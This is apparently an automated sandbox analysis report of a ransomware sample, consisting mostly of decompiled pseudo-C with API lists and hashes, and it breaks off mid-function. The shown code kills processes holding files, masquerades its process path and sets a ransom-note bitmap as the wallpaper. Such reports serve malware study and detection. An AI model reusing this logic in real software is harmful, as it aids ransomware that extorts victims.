OpenMutexW.KERNEL32(00100000,00000000,00CEAE74,00CEAE74,?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE8147
CreateMutexW.KERNEL32(00000000,00000001,00CEAE74,?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE815E
CloseHandle.KERNEL32(00000000,?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE817C
CloseHandle.KERNEL32(?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE8191
CloseHandle.KERNEL32(?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE81AB

Part of subcall function 00CE3F60: GetModuleFileNameW.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 00CE3F80
Part of subcall function 00CE3F60: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 00CE3FA7
Part of subcall function 00CE3F60: GetFileSize.KERNEL32(000000FF,00000000,?,?,?,?,00000000), ref: 00CE3FBB
Part of subcall function 00CE3F60: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CE3FCC
Part of subcall function 00CE3F60: ReadFile.KERNEL32(000000FF,00000000,00000000,00CED4DD,00000000,?,?,?,?,00000000), ref: 00CE3FE3
Part of subcall function 00CE3F60: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE401D
Part of subcall function 00CE3F60: FindCloseChangeNotification.KERNEL32(000000FF,?,?,?,?,00000000), ref: 00CE4026

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFile$Handle$CreateHeapMutex$AllocateChangeFindFreeModuleNameNotificationOpenReadSize
String ID:
API String ID: 215179699-0
Opcode ID: 77c09ffc5633f6d3ee2a933fb2735d48f29b7daf5b9ceb6ac1d29220d3dec4d6
Instruction ID: 8d58a7b8ce350450c4a2cc4b722ddeb169eb91c3a1066df996a7ad25d24dd9ff
Opcode Fuzzy Hash: 77c09ffc5633f6d3ee2a933fb2735d48f29b7daf5b9ceb6ac1d29220d3dec4d6
Instruction Fuzzy Hash: B9F065306483C1AFE7225BE3EC0AB7D3BA0AB04B01F340195F559100F39EA42A5DDA03

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1AC3, Relevance: 1.5, APIs: 1, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CE1AC3(struct HINSTANCE__* __ebx, void* __ecx, CHAR* __esi) {
				_Unknown_base(*)()* _t6;
				intOrPtr _t8;
				void* _t11;

				L0:
				asm("lodsd");
				E00CE16D5(__esi,  *((intOrPtr*)(__esi - 4)));
				_t6 = GetProcAddress(__ebx, __esi); // executed
				_pop(_t11);
				asm("stosd");
				E00CE13DA(_t6, __esi,  *((intOrPtr*)(__esi - 4)));
				_t8 =  *((intOrPtr*)(__esi - 4));
				if(_t11 != 1) {
					goto L0;
				}
				return _t8;
			}

0x00ce1ac3
0x00ce1ac3
0x00ce1ac8
0x00ce1ad0
0x00ce1ad5
0x00ce1ad6
0x00ce1adb
0x00ce1ae0
0x00ce1ae9
0x00000000
0x00000000
0x00ce1aeb

APIs

GetProcAddress.KERNEL32(00000000), ref: 00CE1AD0

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: c41d8f71d10e92068084f5a3ed1de22beeaa02a69bf0abdfa850669fb4f88ce0
Instruction ID: 140727749dcf2d04e8f34dbb54f2c82ee2d2bee7c4a07d3f0d6d079068b195c3
Opcode Fuzzy Hash: c41d8f71d10e92068084f5a3ed1de22beeaa02a69bf0abdfa850669fb4f88ce0
Instruction Fuzzy Hash: ADD0A73901299176AD2B771BCD01C9FF79DEF02314348080CF94155413DBB4A6126751

Uniqueness

Uniqueness Score: -1.00%

Function 00CE81B5, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 68%

			_entry_() {
				void* _t3;
				void* _t4;

				E00CE7E5D(_t3, _t4); // executed
				ExitProcess(0);
				return ExitProcess();
			}

0x00ce81b5
0x00ce81bc
0x00ce81c1

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandLine$AdminArgvInformationThreadUser_wcsicmpwcsrchr
String ID:
API String ID: 4130511436-0
Opcode ID: 7391f82c38b9c36d6b63178b14c4c74015d2b26807c8ae5050c6aa8f2038b253
Instruction ID: 1d1be7234294a7f63841f59df0f5d070280468b8ff8a78b0269e8f92abad0f51
Opcode Fuzzy Hash: 7391f82c38b9c36d6b63178b14c4c74015d2b26807c8ae5050c6aa8f2038b253
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CE4255, Relevance: 73.9, APIs: 38, Strings: 4, Instructions: 414
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CE4255(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				short* _v24;
				short* _v28;
				short* _v32;
				char _v40;
				long _v44;
				struct HDC__* _v48;
				struct HDC__* _v52;
				unsigned int _v56;
				signed int _v60;
				struct HFONT__* _v64;
				void* _v68;
				struct tagSIZE _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				struct tagRECT _v104;
				long _v128;
				long _v132;
				signed short _v134;
				short _v136;
				signed int _v140;
				signed int _v144;
				void _v148;
				intOrPtr _v154;
				short _v156;
				short _v158;
				intOrPtr _v162;
				void _v164;
				signed int _t215;
				intOrPtr* _t230;
				int _t250;
				void* _t252;
				int _t253;
				wchar_t* _t254;
				signed int _t259;
				wchar_t* _t271;

				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v64 = 0;
				_v68 = 0;
				_v80 = 0;
				_v84 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 =  *0xcf0f3e(0);
				if(_v44 != 0) {
					_v48 =  *0xcf0f1a(_v44);
					if(_v48 != 0) {
						_v52 =  *0xcf0f1a(_v44);
						if(_v52 != 0) {
							_v60 =  *0xcf0f0a(_v44, 8) + 0x00000001 & 0xfffffffe;
							_v56 =  *0xcf0f0a(_v44, 0xa) + 0x00000001 & 0xfffffffe;
							_t252 = E00CE1AEC(0xcebd6a);
							_v64 = CreateFontW(_v56 /  *0xcf0f0a(_v44, 0x58) * 7, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 7, 0, 4, 0, _t252);
							RtlFreeHeap( *0xcf0a9e, 0, _t252);
							if(SelectObject(_v48, _v64) != 0) {
								_v68 = RtlAllocateHeap( *0xcf0a9e, 8, 0x800);
								if(_v68 != 0) {
									_t253 =  *0xcf0cfa(_v68, _a4, "README.418990b0.TXT");
									if(GetTextExtentPoint32W(_v48, _v68, _t253,  &_v76) != 0) {
										_v80 =  *0xcf0f16(_v48, _v60, _v56);
										if(_v80 != 0) {
											if(SelectObject(_v48, _v80) != 0) {
												asm("rol eax, 0x8");
												SetTextColor(_v48, 0);
												SetBkMode(_v48, 2);
												asm("rol eax, 0x8");
												SetBkColor(_v48, 0);
												_v104.left = 0;
												_v104.top = (_v56 >> 1) - (_v76.cy << 1);
												_v104.right = _v60;
												_v104.bottom = _v56;
												if(DrawTextW(_v48, _v68, _t253,  &_v104, 0x211) != 0) {
													E00CE13DA( &_v148,  &_v148, 0x2c);
													_v148 = 0x28;
													_v134 = 0x10;
													_v132 = 0;
													_t215 = _v60;
													_v144 = _t215;
													_t259 = _v56;
													_v140 = _t259;
													_v136 = 1;
													_v128 = _t215 * _t259 * ((_v134 & 0x0000ffff) + 7 >> 3);
													_v164 = 0x4d42;
													_v154 = 0x36;
													_v162 = 0x36 + _v128;
													_v158 = 0;
													_v156 = 0;
													_v84 =  *0xcf0f22(_v48,  &_v148, 0,  &_v88, 0, 0);
													if(_v84 != 0) {
														SelectObject(_v52, _v84);
														_push(0xcc0020);
														_push(0);
														_push(0);
														_push(_v48);
														_push(_v140);
														_push(_v144);
														_push(0);
														_push(0);
														_push(_v52);
														if( *0xcf0f0e() != 0) {
															 *0xcf0eb6(0, _v68, 0x23, 0);
															PathAddBackslashW(_v68);
															_t254 = _v68;
															wcscat(_t254, 0xcf093a);
															_t230 = _t254 + wcslen(_t254) * 2;
															 *_t230 = 0x42002e;
															 *((intOrPtr*)(_t230 + 4)) = 0x50004d;
															 *((short*)(_t230 + 8)) = 0;
															_v8 = CreateFileW(_v68, 0x40000000, 0, 0, 4, 0x80, 0);
															if(_v8 != 0xffffffff) {
																if(WriteFile(_v8,  &_v164, 0xe,  &_v20, 0) != 0) {
																	if(WriteFile(_v8,  &_v148, 0x28,  &_v20, 0) != 0) {
																		if(WriteFile(_v8, _v88, _v128,  &_v20, 0) != 0) {
																			CloseHandle(_v8);
																			_v8 = 0;
																			_v16 = 2;
																			if( *0xcf0a9a != 0) {
																				_v16 = _v16 | 0x00000100;
																			}
																			_v24 = E00CE1AEC(0xcebd92);
																			if(RegOpenKeyExW(0x80000001, _v24, 0, _v16,  &_v12) == 0) {
																				_v28 = E00CE1AEC(0xcebd7a);
																				if(RegSetValueExW(_v12, _v28, 0, 1, _v68, 2 + wcslen(_v68) * 2) == 0) {
																					_v32 = E00CE1AEC(0xcebdc2);
																					_t271 =  &_v40;
																					 *_t271 = 0x300031;
																					_t271[1] = 0;
																					_t250 = RegSetValueExW(_v12, _v32, 0, 1, _t271, 2 + wcslen(_t271) * 2);
																					if(_t250 == 0) {
																						_t250 = SystemParametersInfoW(0x14, 0, _v68, 3);
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				if(_v32 != 0) {
					_t250 = RtlFreeHeap( *0xcf0a9e, 0, _v32);
				}
				if(_v28 != 0) {
					_t250 = RtlFreeHeap( *0xcf0a9e, 0, _v28);
				}
				if(_v24 != 0) {
					_t250 = RtlFreeHeap( *0xcf0a9e, 0, _v24);
				}
				if(_v12 != 0) {
					_t250 = RegCloseKey(_v12);
				}
				if(_v8 != 0 && _v8 != 0xffffffff) {
					_t250 = CloseHandle(_v8);
				}
				if(_v84 != 0) {
					_t250 = DeleteObject(_v84);
				}
				if(_v80 != 0) {
					_t250 = DeleteObject(_v80);
				}
				if(_v68 != 0) {
					_t250 = RtlFreeHeap( *0xcf0a9e, 0, _v68);
				}
				if(_v64 != 0) {
					_t250 = DeleteObject(_v64);
				}
				if(_v52 != 0) {
					_t250 = DeleteDC(_v52);
				}
				if(_v48 != 0) {
					_t250 = DeleteDC(_v48);
				}
				if(_v44 != 0) {
					return  *0xcf0f42(0, _v44);
				}
				return _t250;
			}

0x00ce4263
0x00ce426a
0x00ce4271
0x00ce4278
0x00ce427f
0x00ce4286
0x00ce428d
0x00ce4294
0x00ce429b
0x00ce42a2
0x00ce42a9
0x00ce42b0
0x00ce42bf
0x00ce42c6
0x00ce42d6
0x00ce42dd
0x00ce42ed
0x00ce42f4
0x00ce430c
0x00ce4320
0x00ce432d
0x00ce436d
0x00ce4379
0x00ce438d
0x00ce43a7
0x00ce43ae
0x00ce43c9
0x00ce43de
0x00ce43f4
0x00ce43fb
0x00ce4410
0x00ce441d
0x00ce4426
0x00ce4431
0x00ce443d
0x00ce4446
0x00ce444c
0x00ce445f
0x00ce4465
0x00ce446b
0x00ce4486
0x00ce4496
0x00ce449b
0x00ce44a5
0x00ce44ae
0x00ce44b5
0x00ce44b8
0x00ce44be
0x00ce44c1
0x00ce44c7
0x00ce44e1
0x00ce44e4
0x00ce44f2
0x00ce44fb
0x00ce4501
0x00ce450a
0x00ce452d
0x00ce4534
0x00ce4541
0x00ce4547
0x00ce454c
0x00ce454e
0x00ce4550
0x00ce4553
0x00ce4559
0x00ce455f
0x00ce4561
0x00ce4563
0x00ce456e
0x00ce457e
0x00ce4587
0x00ce458d
0x00ce459b
0x00ce45ae
0x00ce45b1
0x00ce45b7
0x00ce45be
0x00ce45df
0x00ce45e6
0x00ce4607
0x00ce4628
0x00ce4646
0x00ce4650
0x00ce4656
0x00ce465d
0x00ce466b
0x00ce466d
0x00ce466d
0x00ce467e
0x00ce469a
0x00ce46ab
0x00ce46d9
0x00ce46e7
0x00ce46ea
0x00ce46ed
0x00ce46f3
0x00ce4717
0x00ce471f
0x00ce472c
0x00ce472c
0x00ce471f
0x00ce46d9
0x00ce469a
0x00ce4646
0x00ce4628
0x00ce4607
0x00ce45e6
0x00ce456e
0x00ce4534
0x00ce4486
0x00ce4410
0x00ce43fb
0x00ce43de
0x00ce43ae
0x00ce438d
0x00ce42f4
0x00ce42dd
0x00ce4736
0x00ce4743
0x00ce4743
0x00ce474d
0x00ce475a
0x00ce475a
0x00ce4764
0x00ce4771
0x00ce4771
0x00ce477b
0x00ce4780
0x00ce4780
0x00ce478a
0x00ce4795
0x00ce4795
0x00ce479f
0x00ce47a4
0x00ce47a4
0x00ce47ae
0x00ce47b3
0x00ce47b3
0x00ce47bd
0x00ce47ca
0x00ce47ca
0x00ce47d4
0x00ce47d9
0x00ce47d9
0x00ce47e3
0x00ce47e8
0x00ce47e8
0x00ce47f2
0x00ce47f7
0x00ce47f7
0x00ce4801
0x00000000
0x00ce4808
0x00ce4816

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4743
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE475A
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4771
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000), ref: 00CE4780
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000), ref: 00CE4795
DeleteObject.GDI32(00000000), ref: 00CE47A4
DeleteObject.GDI32(00000000), ref: 00CE47B3
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE47CA
DeleteObject.GDI32(00000000), ref: 00CE47D9
DeleteDC.GDI32(00000000), ref: 00CE47E8
DeleteDC.GDI32(00000000), ref: 00CE47F7

Strings

(, xrefs: 00CE449B
README.418990b0.TXT, xrefs: 00CE43B5
BM, xrefs: 00CE44E4
.418990b0, xrefs: 00CE4590

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$FreeHeap$Object$Close$Handle
String ID: ($.418990b0$BM$README.418990b0.TXT
API String ID: 2367682264-3811284278
Opcode ID: 65fdc5d24122b006145e157a1fdb6fabe1443758cb68b8b4620d2becf899969a
Instruction ID: 64cca04a0823f6ffc858d77580867daefcf21d7ffef36691d82aaaf59efdb0ad
Opcode Fuzzy Hash: 65fdc5d24122b006145e157a1fdb6fabe1443758cb68b8b4620d2becf899969a
Instruction Fuzzy Hash: 22023871A40208EFEB259FA1DC49BEEBBB6FF04B05F204024F611B91A1D7B11A94DF56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE57E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 208
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CE57E5(wchar_t* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				wchar_t* _v36;
				void* _v40;
				void* _v44;
				wchar_t* _t57;
				long _t63;
				void* _t67;
				long _t68;
				wchar_t* _t81;
				wchar_t* _t89;
				void* _t90;
				signed int _t91;
				void* _t98;
				wchar_t* _t99;
				long* _t100;
				intOrPtr _t101;
				void* _t102;
				wchar_t* _t103;
				long* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;

				_v8 = 0;
				_t57 = wcsrchr(_a4, 0x5c);
				_t106 = _t105 + 8;
				_v36 = _t57;
				if(_v36 == 0) {
					L34:
					return _v8;
				} else {
					_v32 = GetCurrentProcessId();
					_t98 = E00CE56F9();
					if(_t98 != 0) {
						_v24 = 0x400;
						_v20 = RtlAllocateHeap( *0xcf0a9e, 0, _v24);
						while(1) {
							_t63 = NtQuerySystemInformation(0x10, _v20, _v24,  &_v24);
							if(_t63 == 0) {
								break;
							}
							if(_t63 != 0xc0000004) {
								RtlFreeHeap( *0xcf0a9e, 0, _v20);
								return _v8;
							} else {
								_v20 = RtlReAllocateHeap( *0xcf0a9e, 0, _v20, _v24);
								continue;
							}
							goto L35;
						}
						_t67 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
						_v40 = _t67;
						_t104 = _v20;
						asm("lodsd");
						_t102 = _t67;
						_v28 = 0;
						do {
							_t101 = _v32;
							_t68 = _v28;
							if(_t104[1] != _t98 ||  *_t104 <= 4 ||  *_t104 == _t68 ||  *_t104 == _t101) {
								goto L32;
							} else {
								_v12 = OpenProcess(0x100441, 0,  *_t104);
								if(_v12 != 0) {
									if(DuplicateHandle(_v12, _t104[1] & 0x0000ffff, 0xffffffff,  &_v16, 0, 0, 2) != 0) {
										if(E00CE5675(_v16, _v40) != 0) {
											E00CE13DA(_t75, _v40, 0x10000);
											goto L30;
										} else {
											_t81 = wcsrchr(_v40 + 4, 0x5c);
											_t106 = _t106 + 8;
											if(_t81 == 0) {
												L28:
												E00CE13DA(_t81, _v40, 0x10000);
												L30:
												CloseHandle(_v16);
												goto L31;
											} else {
												_t81 =  *0xcf0cd6(_t81, _v36);
												_t106 = _t106 + 8;
												if(_t81 != 0) {
													goto L28;
												} else {
													_v44 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
													if(NtQueryInformationProcess(_v12, 0x1b, _v44, 0x10000,  &_v24) == 0) {
														_t89 = wcsrchr( *(_v44 + 4), 0x5c);
														_t107 = _t106 + 8;
														_t99 = _t89;
														if(_t99 != 0) {
															_t100 =  &(_t99[0]);
															_t103 =  *0xcf090c; // 0x7aea38
															while(1) {
																_t90 =  *0xcf0cd6(_t103, _t100);
																_t108 = _t107 + 8;
																if(_t90 == 0) {
																	break;
																}
																_t91 = wcslen(_t103);
																_t107 = _t108 + 4;
																_t103 = _t103 + 2 + _t91 * 2;
																if( *_t103 != 0) {
																	continue;
																} else {
																	CloseHandle(_v16);
																	TerminateProcess(_v12, 0);
																	WaitForSingleObject(_v12, 0xffffffff);
																	CloseHandle(_v12);
																	_v8 = 1;
																}
																goto L27;
															}
														}
													}
													L27:
													RtlFreeHeap( *0xcf0a9e, 0, _v44);
												}
											}
										}
									} else {
										_v28 =  *_t104;
										L31:
										CloseHandle(_v12);
										goto L32;
									}
								} else {
									_v28 =  *_t104;
									goto L32;
								}
							}
							break;
							L32:
							_t104 =  &(_t104[4]);
							_t102 = _t102 - 1;
						} while (_t102 != 0);
						RtlFreeHeap( *0xcf0a9e, 0, _v40);
						RtlFreeHeap( *0xcf0a9e, 0, _v20);
					}
					goto L34;
				}
				L35:
			}

0x00ce57f0
0x00ce57fc
0x00ce5802
0x00ce5805
0x00ce580c
0x00ce5a8e
0x00ce5a99
0x00ce5812
0x00ce5818
0x00ce5820
0x00ce5824
0x00ce582a
0x00ce5842
0x00ce5845
0x00ce5851
0x00ce5859
0x00000000
0x00000000
0x00ce5864
0x00ce588c
0x00ce589d
0x00ce5866
0x00ce587a
0x00000000
0x00ce587a
0x00000000
0x00ce5864
0x00ce58af
0x00ce58b5
0x00ce58b8
0x00ce58bb
0x00ce58bc
0x00ce58be
0x00ce58c5
0x00ce58c5
0x00ce58c8
0x00ce58ce
0x00000000
0x00ce58ed
0x00ce58fc
0x00ce5903
0x00ce592b
0x00ce5944
0x00ce5a49
0x00000000
0x00ce594a
0x00ce5953
0x00ce5959
0x00ce595e
0x00ce5a32
0x00ce5a3a
0x00ce5a4e
0x00ce5a51
0x00000000
0x00ce5964
0x00ce5968
0x00ce596e
0x00ce5973
0x00000000
0x00ce5979
0x00ce598c
0x00ce59a8
0x00ce59b3
0x00ce59b9
0x00ce59bc
0x00ce59c0
0x00ce59c2
0x00ce59c5
0x00ce59cb
0x00ce59cd
0x00ce59d3
0x00ce59d8
0x00000000
0x00000000
0x00ce59dd
0x00ce59e3
0x00ce59e6
0x00ce59ee
0x00000000
0x00ce59f0
0x00ce59f3
0x00ce59fe
0x00ce5a09
0x00ce5a12
0x00ce5a18
0x00ce5a18
0x00000000
0x00ce59ee
0x00ce59da
0x00ce59c0
0x00ce5a1f
0x00ce5a2a
0x00ce5a2a
0x00ce5973
0x00ce595e
0x00ce592d
0x00ce592f
0x00ce5a57
0x00ce5a5a
0x00000000
0x00ce5a5a
0x00ce5905
0x00ce5907
0x00000000
0x00ce5907
0x00ce5903
0x00000000
0x00ce5a60
0x00ce5a60
0x00ce5a63
0x00ce5a64
0x00ce5a77
0x00ce5a88
0x00ce5a88
0x00000000
0x00ce5824
0x00000000

APIs

wcsrchr.NTDLL ref: 00CE57FC
GetCurrentProcessId.KERNEL32(?,?), ref: 00CE5812

Part of subcall function 00CE56F9: CreateFileW.KERNEL32(NUL,80000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,?), ref: 00CE571F
Part of subcall function 00CE56F9: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00CE5744
Part of subcall function 00CE56F9: NtQuerySystemInformation.NTDLL(00000010,?,00000400,00000400), ref: 00CE5759
Part of subcall function 00CE56F9: GetCurrentProcessId.KERNEL32(?,?,?), ref: 00CE5790
Part of subcall function 00CE56F9: RtlFreeHeap.NTDLL(00000000,?), ref: 00CE57C4
Part of subcall function 00CE56F9: CloseHandle.KERNEL32(000000FF,?,?,?), ref: 00CE57D3

RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00CE583C
NtQuerySystemInformation.NTDLL(00000010,000000FF,00000400,00000400), ref: 00CE5851
RtlReAllocateHeap.NTDLL(00000000,000000FF,00000400), ref: 00CE5874
RtlAllocateHeap.NTDLL(00000008,00010000), ref: 00CE58AF
OpenProcess.KERNEL32(00100441,00000000,000000FF,?,?), ref: 00CE58F6
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5A77
RtlFreeHeap.NTDLL(00000000,000000FF), ref: 00CE5A88

Strings

8z, xrefs: 00CE59C5

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Allocate$FreeProcess$CurrentInformationQuerySystem$CloseCreateFileHandleOpenwcsrchr
String ID: 8z
API String ID: 37400035-4141262030
Opcode ID: 2efd2cc68df7fa989279fc2f954d99c1a38a392b05d03748d23d84e524bd13fe
Instruction ID: ac6d96fc052543b00b4befc19bde0fe5c9c9dc40467001e3df0952123f1bd761
Opcode Fuzzy Hash: 2efd2cc68df7fa989279fc2f954d99c1a38a392b05d03748d23d84e524bd13fe
Instruction Fuzzy Hash: 08818C31A00609EFDF119F91DC49BBEBBB2FF08B05F200125F611B21A2D7726A50EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE380C, Relevance: 15.1, APIs: 10, Instructions: 78
memorylibrarynativeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CE380C() {
				long _v8;
				short _v528;
				long _t26;
				void* _t39;

				_t39 = E00CE3912();
				E00CE13DA( &_v528,  &_v528, 0x208);
				GetWindowsDirectoryW( &_v528, 0x104);
				wcscat( &_v528, "\\");
				E00CE16D5(0xceaf78,  *0x00CEAF74);
				wcscat( &_v528, 0xceaf78);
				_v8 = 0x1000;
				_t26 = NtAllocateVirtualMemory(0xffffffff, 0xcf101c, 0,  &_v8, 0x3000, 4);
				if( *0xcf101c != 0) {
					wcscpy( *0xcf101c,  &_v528);
					 *0xcf0d4a( *((intOrPtr*)(_t39 + 0x1c)));
					RtlInitUnicodeString( *((intOrPtr*)(_t39 + 0x10)) + 0x38,  *0xcf101c);
					RtlInitUnicodeString( *((intOrPtr*)(_t39 + 0x10)) + 0x40,  &_v528);
					 *0xcf0d4e( *((intOrPtr*)(_t39 + 0x1c)));
					return E00CE13DA( *0xcf0d02(0, E00CE37C8, _t39), 0xceaf78,  *((intOrPtr*)(0xceaf74)));
				}
				return _t26;
			}

0x00ce381f
0x00ce382d
0x00ce383e
0x00ce3850
0x00ce3863
0x00ce3870
0x00ce3879
0x00ce3894
0x00ce38a1
0x00ce38b0
0x00ce38bc
0x00ce38cf
0x00ce38e3
0x00ce38ec
0x00000000
0x00ce3904
0x00ce3911

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,?,00000208), ref: 00CE383E
wcscat.NTDLL ref: 00CE3850
wcscat.NTDLL ref: 00CE3870
NtAllocateVirtualMemory.NTDLL(000000FF,00CF101C,00000000,00001000,00003000,00000004), ref: 00CE3894
wcscpy.NTDLL ref: 00CE38B0
RtlEnterCriticalSection.NTDLL(?), ref: 00CE38BC
RtlInitUnicodeString.NTDLL(?), ref: 00CE38CF
RtlInitUnicodeString.NTDLL(?,?), ref: 00CE38E3
RtlLeaveCriticalSection.NTDLL(?), ref: 00CE38EC
LdrEnumerateLoadedModules.NTDLL(00000000,00CE37C8,00000000), ref: 00CE38FA

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitSectionStringUnicodewcscat$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindowswcscpy
String ID:
API String ID: 4060316204-0
Opcode ID: 7212ab0e290bbc61ef41d21fc7a504fb2cc851346d7e48814104b619376ea49f
Instruction ID: 8fa4a21871f6e9eaacbdebc88c73532e6e90951377cac3ab56635130765f0d38
Opcode Fuzzy Hash: 7212ab0e290bbc61ef41d21fc7a504fb2cc851346d7e48814104b619376ea49f
Instruction Fuzzy Hash: 992181B6440344FFD720AB91EC4DFAE7B7CEB04B11F200251FA15A20A2DB746A54DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CE56F9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79
memoryfilenativeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CE56F9() {
				signed int _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _t27;
				long _t29;
				long _t32;
